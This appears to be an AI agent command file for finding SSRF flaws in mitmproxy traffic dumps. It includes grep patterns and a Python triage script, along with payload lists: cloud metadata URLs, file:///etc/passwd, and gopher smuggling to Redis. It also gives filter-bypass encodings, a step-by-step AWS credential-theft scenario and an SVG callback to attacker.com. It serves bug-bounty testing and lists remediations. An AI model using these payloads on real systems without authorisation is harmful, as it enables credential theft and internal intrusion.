mitm-find-ssrf


Find SSRF Vulnerabilities

Analyze the mitmproxy dump (log.txt) for SSRF vulnerabilities for: $ARGUMENTS

Requires: `log.txt` in the current directory. If it's missing, capture traffic first:

```bash
mitmdump --set flow_detail=3 2>&1 | tee log.txt
```

High-Value SSRF Patterns (from 113 real HackerOne bounty reports)

1. URL Parameters in Requests

Common vulnerable parameters:

```
url, uri, path, dest, redirect, link, href
src, source, file, document, page, load
target, proxy, fetch, request, callback
webhook, hook, endpoint, api_url, base_url
image_url, avatar_url, icon_url, logo_url
pdf_url, export_url, import_url, feed_url
```

Search patterns:

```bash
grep -iE '(url|uri|path|src|href|link|dest|redirect|webhook|callback|fetch|proxy|target)[=:]["'\''"]?https?://' log.txt
```

2. File/Image Processing Endpoints

Real examples from bounties:
  • SVG upload triggers SSRF (Shopify)
  • Image URL in product creation
  • PDF generation with external resources
  • Avatar/profile picture from URL

Search patterns:

```bash
grep -iE '\.(svg|pdf|xml|html)' log.txt
grep -iE '(upload|import|fetch|process).*url' log.txt
```

3. Integration/Webhook Endpoints

Real examples:
  • Sentry source code scraping
  • Git clone with credentials
  • OAuth callback manipulation
  • Webhook URL specification

Search patterns:

```bash
grep -iE '(webhook|callback|hook|notify|integration)' log.txt
grep -iE 'git.*clone|git.*url' log.txt
```

4. Host Header Injection

Real example: Host header bypass accessing internal subdomains

```
Host: internal.target.com
X-Forwarded-Host: internal.target.com
X-Original-URL: /internal/admin
```

Search patterns:

```bash
grep -iE '^Host:' log.txt
grep -iE 'X-Forwarded|X-Original' log.txt
```

SSRF Target Payloads

Internal Network Probing

```
http://127.0.0.1
http://localhost
http://[::1]
http://0.0.0.0
http://169.254.169.254  # AWS metadata
http://metadata.google.internal  # GCP metadata
http://100.100.100.200  # Alibaba metadata
```

Cloud Metadata Endpoints (Critical)

  • AWS
  • GCP
  • Azure
  • DigitalOcean


Protocol Smuggling

```
file:///etc/passwd
dict://localhost:11211/
gopher://localhost:6379/_*1%0d%0a$4%0d%0aINFO%0d%0a
ldap://localhost/
```

Vulnerability Categories & Severity

| Type | Severity | Impact |
| --- | --- | --- |
| Cloud metadata access | CRITICAL | AWS keys, service credentials |
| Internal service access | HIGH | Database, cache, admin panels |
| Blind SSRF (OOB) | MEDIUM | Port scanning, internal recon |
| Limited SSRF (no response) | LOW | Denial of service, limited recon |

Testing Methodology

Step 1: Identify URL Input Points

```bash
# Find URL-like parameters
grep -iE "https?://[^[:space:]\"'<>]+" log.txt | grep -iE '(url|uri|src|href|link|path)='

# Find base64 encoded URLs
grep -oE '[A-Za-z0-9+/]{20,}={0,2}' log.txt | while read -r b; do echo "$b" | base64 -d 2>/dev/null | grep -q 'http' && echo "Base64 URL: $b"; done
```
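Added here as a worked version of Step 1 (example code, not part of the original command file): a Python triage helper that pulls URL-valued parameters out of a flow_detail=3 dump, including base64-wrapped ones, and tags names that appear in the parameter list above. The dump excerpt is constructed, and hostnames such as target.example and img.example are placeholders.

```python
import base64
import re
from urllib.parse import parse_qsl

# Parameter names the checklist above lists as frequent SSRF sinks.
SUSPECT_PARAMS = {"url", "uri", "path", "dest", "redirect", "link", "href", "src", "source",
                  "file", "document", "page", "load", "target", "proxy", "fetch", "request",
                  "callback", "webhook", "hook", "endpoint", "api_url", "base_url", "image_url",
                  "avatar_url", "icon_url", "logo_url", "pdf_url", "export_url", "import_url", "feed_url"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")   # same heuristic as the grep above

def decode_b64_url(token):
    """Decoded text if token is base64 hiding an http(s) URL, else None."""
    if not B64_RE.fullmatch(token):
        return None
    try:
        text = base64.b64decode(token + "=" * (-len(token) % 4), validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if URL_RE.match(text) else None

def _pairs(line):
    """(name, value) pairs from a request-line query, a form body or a JSON body."""
    m = re.search(r"\b[A-Z]+ https?://[^\s?]+\?(\S+)", line)
    if m:
        yield from parse_qsl(m.group(1), keep_blank_values=True)
    elif "=" in line and " " not in line:          # urlencoded body line
        yield from parse_qsl(line, keep_blank_values=True)
    yield from re.findall(r'"([A-Za-z0-9_]+)"\s*:\s*"([^"]*)"', line)

def find_url_inputs(dump_text):
    """(line_no, param, url, known_sink) for each parameter whose value is a plain or base64 URL."""
    hits = []
    for no, line in enumerate(dump_text.splitlines(), 1):
        for name, value in _pairs(line.strip()):
            # parse_qsl turns '+' into ' '; a base64 token never contains spaces
            url = value if URL_RE.match(value) else decode_b64_url(value.replace(" ", "+"))
            if url:
                hits.append((no, name, url, name.lower() in SUSPECT_PARAMS))
    return hits
# Constructed dump excerpt in the style of flow_detail=3 output (not real traffic).
SAMPLE_DUMP = """\
10.0.0.5:50312: POST https://target.example/api/import?image_url=http://img.example/a.png
    Content-Type: application/x-www-form-urlencoded
    callback=aHR0cDovLzEyNy4wLjAuMS8=&name=test
 << 200 OK 14b
10.0.0.5:50313: POST https://target.example/api/export
    {"document_link": "http://files.example/report.pdf", "title": "q1"}
"""
```

Running `find_url_inputs(SAMPLE_DUMP)` reports the query parameter, the base64-wrapped loopback URL in the form body, and the JSON field, the last one flagged as not being a known sink name.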

Step 2: Test with Internal Targets

  • Test localhost
  • Test metadata (AWS)
  • Test with DNS rebinding


Step 3: Bypass Common Filters

```
# IP variations

# DNS bypass
http://localhost → http://localtest.me
http://169.254.169.254 → http://[0:0:0:0:0:ffff:169.254.169.254]

# URL encoding
http://127.0.0.1 → http://%31%32%37%2e%30%2e%30%2e%31
```

Step 4: Confirm with Out-of-Band

Use Burp Collaborator, webhook.site, or interactsh.

Real Attack Scenarios

Scenario 1: AWS Credential Theft via SSRF

1. Find image import feature: POST /api/import?image_url=XXX
2. Set URL to: http://169.254.169.254/latest/meta-data/iam/security-credentials/
3. Response contains IAM role name
4. Fetch: http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
5. Get temporary AWS credentials

Scenario 2: Internal Service Access

1. Find webhook configuration
2. Set webhook URL to internal service: http://internal-admin.local/
3. Trigger webhook
4. Access internal admin panel functionality

Scenario 3: Blind SSRF via SVG

1. Upload SVG file with external reference:
   <svg><image href="http://attacker.com/callback"/></svg>
2. Server processes SVG, fetches external URL
3. Attacker receives connection from internal IP

Output Format

```
SSRF Finding: [Brief Description]

Endpoint: METHOD https://target.com/path
Parameter: param_name
Type: [Full|Blind|Partial]  Severity: [CRITICAL|HIGH|MEDIUM|LOW]
Evidence: [Request showing URL parameter]
Tested Payloads:
Impact:
  • Cloud credential theft
  • Internal network access
  • Service enumeration
Test Command: curl -X METHOD 'https://target.com/...' -d 'url=http://169.254.169.254/'
Remediation:
  • Whitelist allowed domains
  • Block private IP ranges
  • Use allowlist for protocols (http/https only)
  • Disable redirects or validate redirect targets
```

False Positives to Ignore

  • Static CDN URLs that are hardcoded
  • OAuth redirect_uri that's validated against whitelist
  • Webhook URLs that only accept HTTPS and validated domains
  • URL parameters that are client-side only (JS fetch)